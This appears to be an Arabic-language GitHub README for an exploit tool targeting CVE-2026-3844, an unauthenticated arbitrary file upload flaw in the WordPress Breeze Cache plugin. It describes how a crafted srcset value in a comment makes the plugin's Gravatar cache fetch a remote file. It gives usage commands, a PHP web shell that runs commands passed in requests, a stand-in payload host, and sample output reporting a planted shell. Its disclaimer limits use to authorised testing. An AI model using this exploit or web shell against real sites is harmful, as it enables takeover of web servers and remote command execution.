
WordPress - Breeze Cache <= 2.4.4 - رفع ملفات تعسفي دون مصادقة
هذه الأداة مقدمة لأغراض تعليمية وبحوث أمنية فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على
الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلف
أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
CVE-2026-3844 هو ثغرة حرجة لرفع ملفات تعسفي غير مصادق عليه في إضافة Breeze Cache لووردبريس (الإصدارات ≤ 2.4.4). تفشل الإضافة في التحقق بشكل صحيح من معامل في التعليقات، مما يسمح للمهاجمين عن بُعد برفع ملفات خبيثة (بما في ذلك القشرة الويب) إلى الخادم.
srcsetيستغل الثغرة وظيفة تخزين Gravatar في Breeze. عند نشر تعليق يحتوي على معامل srcset مصمم خصيصًا يحتوي على عنوان URL لملف بعيد، يقوم Breeze بتنزيل الملف وتخزينه محليًا في:
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]
المتطلب الأساسي: يجب تفعيل خيار "Host Files Locally - Gravatars" في إعدادات Breeze.
# استنساخ المستودع
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# تثبيت التبعيات
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# التحقق مما إذا كان الهدف ضعيفًا دون استغلال
python3 CVE-2026-3844.py -u http://target.com --check-only
# استخدام عنوان URL مخصص للحمولة
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# حفظ المخرجات في ملف
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# زيادة المهلة للأهداف البطيئة
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| الوسيط | الوصف |
|---|---|
-u, --url | عنوان URL للهدف (مطلوب) |
-p, --payload | عنوان URL للحمولة البعيدة |
--timeout | مهلة الطلب بالثواني (الافتراضي: 15) |
--check-only | التحقق فقط إذا كان الهدف ضعيفًا |
-o, --output | حفظ عنوان URL للقشرة في ملف |
أنشئ قشرة الويب الخاصة بك (shell.php):
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd"]);
echo "</pre>";
}
?>
استضفها في مكان يمكن الوصول إليه، ثم استخدم:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
تتحقق الأداة تلقائيًا من سلسلة التحقق 4356452d323032362d33383434 (ترميز hex لـ "CVE-2026-3844") في الملف المرفوع لتأكيد نجاح الاستغلال.
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)
[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # Main exploit script
├── README.md # This file
└── LICENSE # MIT License
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
إذا وجدت هذه الأداة مفيدة، يرجى منحها نجمة ⭐ على GitHub!